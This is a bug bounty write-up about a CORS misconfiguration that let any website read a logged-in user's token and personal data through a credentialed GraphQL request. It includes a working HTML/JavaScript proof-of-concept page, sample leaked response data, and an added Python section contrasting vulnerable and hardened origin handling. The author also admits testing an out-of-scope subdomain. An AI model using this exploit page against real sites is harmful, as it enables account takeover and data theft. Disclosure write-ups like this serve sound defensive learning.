CORS Misconfiguration: Steal victim token and PII leads to ATO
BugBounty | 2021. 3. 22. 06:00
Today I will talk about a bug I found in July 2019 in a private program on HackerOne. The bug is called "Cross-Origin Resource Sharing (CORS) Misconfiguration".
1 - Firstly, what is CORS?
Cross-Origin Resource Sharing (CORS) is a mechanism that lets web browsers perform cross-domain requests using the XMLHttpRequest API in a controlled manner. These cross-origin requests carry an Origin header that identifies the origin initiating the request. CORS defines the protocol between a web browser and a server for deciding whether a cross-origin request (and the reading of its response) is allowed.
2 - Summary
After reviewing the program scope, I concluded that all subdomains were out of scope; only the main domain was in scope.
3 - Steps To Reproduce
Day one: I started hunting on the main domain www.redact.com. I learned how the program's services work and also tested for bugs, but the site is quite secure.
Day two: I went back to my testing again. When I viewed the source code I noticed a subdomain in the code named core-plugins.redact.com.
I knew it was out of scope, but my mind told me to test it...
The subdomain core-plugins.redact.com does not have a registration page; I could just log in with my account from the main domain (SSO). After login I found this request, which printed PII in the response: token, email, user info, etc.
Then I noticed the "Access-Control-Allow-Credentials: true" header, so I changed the Origin: I replaced core-plugins.redact.com with https://evil.com, and it worked! Then I edited the GraphQL request to steal more info.
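The two findings above (the server echoes an arbitrary Origin while sending Access-Control-Allow-Credentials: true) are what make the bug exploitable. The following is an added example, not code from the original write-up or from the affected program: framework-independent Python that shows the vulnerable origin handling next to a hardened exact-match allowlist, plus a check a tester or developer can run over a response's headers to confirm or rule out credentialed origin reflection. The allowlist entries and origins are constructed sample values.

```python
"""Added example: CORS origin handling, vulnerable vs. hardened, plus a check.

Each *_cors_headers function takes the request's Origin header and returns the
CORS response headers a server would emit. Origins and allowlist entries are
constructed for this example; they are not the affected program's values.
"""
from typing import Dict, FrozenSet, Optional

# Constructed allowlist: exact origins (scheme + host [+ port]) allowed to read
# credentialed API responses. Exact matching rules out the usual suffix/substring
# bypasses such as trusted-name.attacker.example.
ALLOWED_ORIGINS: FrozenSet[str] = frozenset({
    "https://www.example-app.test",
    "https://core-plugins.example-app.test",
})


def vulnerable_cors_headers(origin: Optional[str]) -> Dict[str, str]:
    """Reflect whatever Origin the browser sent and allow credentials.

    This is the misconfiguration in the write-up: any site the user visits can
    make the browser send the user's cookies and then read the response body.
    """
    if origin is None:
        return {}
    return {
        "Access-Control-Allow-Origin": origin,
        "Access-Control-Allow-Credentials": "true",
    }


def hardened_cors_headers(origin: Optional[str]) -> Dict[str, str]:
    """Echo the Origin only when it is on the exact-match allowlist.

    Unknown origins (including the literal "null" origin) get no
    Access-Control-Allow-Origin header at all, so the browser refuses to expose
    the response to the calling page. "Vary: Origin" stops shared caches from
    serving one origin's answer to another.
    """
    if origin is None or origin not in ALLOWED_ORIGINS:
        return {"Vary": "Origin"}
    return {
        "Access-Control-Allow-Origin": origin,
        "Access-Control-Allow-Credentials": "true",
        "Vary": "Origin",
    }


def is_credentialed_reflection(origin_sent: str, headers: Dict[str, str]) -> bool:
    """Return True when a response lets the (arbitrary) origin read it with credentials.

    Run this over the response headers of a request sent with a made-up Origin,
    as the write-up did. A wildcard "*" with credentials is not counted: browsers
    reject that combination, so it is a bug but not a readable response.
    """
    lowered = {k.lower(): v for k, v in headers.items()}
    acao = lowered.get("access-control-allow-origin")
    acac = lowered.get("access-control-allow-credentials", "").strip().lower() == "true"
    return acac and acao == origin_sent


if __name__ == "__main__":
    probe = "https://evil.example"  # constructed attacker-style origin for the check
    for name, fn in (("vulnerable", vulnerable_cors_headers), ("hardened", hardened_cors_headers)):
        hdrs = fn(probe)
        print(f"{name:10s} {hdrs}  reflection={is_credentialed_reflection(probe, hdrs)}")
```

The check deliberately keys on the exact value you sent rather than on the presence of an Allow-Origin header: a fixed, legitimate origin coming back is normal, while your own arbitrary value coming back together with credentials is the finding.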
4 - Exploitation Code
<!DOCTYPE html>
<html>
<head>
<script>
// Proof of concept from the write-up: when a logged-in victim loads this page,
// the browser sends a credentialed request to the vulnerable endpoint and the
// page can read the response because the server reflects the attacker's origin.
function cors_exploit() {
  var xhttp = new XMLHttpRequest();
  xhttp.onreadystatechange = function() {
    if (this.readyState == 4 && this.status == 200) {
      // Show the response and render it into the "cors" div. (The original
      // targeted a non-existent "demo" element and assigned alert()'s
      // undefined return value to innerHTML.)
      alert(this.responseText);
      document.getElementById("cors").innerText = this.responseText;
    }
  };
  xhttp.open("GET", "https://core-plugins.redact.com/graphql?app=web&query=query%20App%20{customer%20{id,...F2}}%20fragment%20F0%20on%20Customer%20{is_premier,is_premier_parent,premier_permissions,username,user_type,full_name,organization_id,customer_id,hostname,token,id}%20fragment%20F1%20on%20Customer%20{premier_permissions,is_premier_parent,id}%20fragment%20F2%20on%20Customer%20{username,full_name,email,is_admin,id,...F0,...F1}", true);
  // Attach the victim's cookies to the cross-origin request.
  xhttp.withCredentials = true;
  xhttp.send();
}
</script>
</head>
<body onload="cors_exploit()">
<center>
<h2>Exploiting CORS Vulnerability</h2>
<h3>Extract SID</h3>
<div id="cors">
<button type="button" onclick="cors_exploit()">Exploit</button>
</div>
</center>
</body>
</html>
Then I uploaded it to my website www.mysite.com/cors.html and it worked: the data was printed!!
{
  "data": {
    "customer": {
      "id": "u285728853",
      "username": "storedthings133776",
      "full_name": null,
      "email": "storedthings1337@gmail.com",
      "is_admin": false,
      "is_premier": false,
      "is_premier_parent": false,
      "premier_permissions": [],
      "user_type": "core user",
      "organization_id": null,
      "customer_id": "285728853",
      "hostname": "core-plugins.redact.com",
      "token": "1/eyJjbGllbnRfaWQiOiI3YTE*****************"
    }
  },
  "extensions": {}
}
5 - The Token
With the token, an attacker could access the victim's account, perform any action on behalf of the victim, and call other endpoints of the API.
Timeline
Nov 19th: Report sent
Nov 20th: Triaged
Nov 20th: Rewarded
— — — — — — — — — — — — — — — — — — — — — — — — — — — — — —
That's all, thank you very much for reading it till the end. I hope you enjoyed it. Thanks to @elmrhaseel @ayoubakup @Moroccan-Bugbounty-Hunters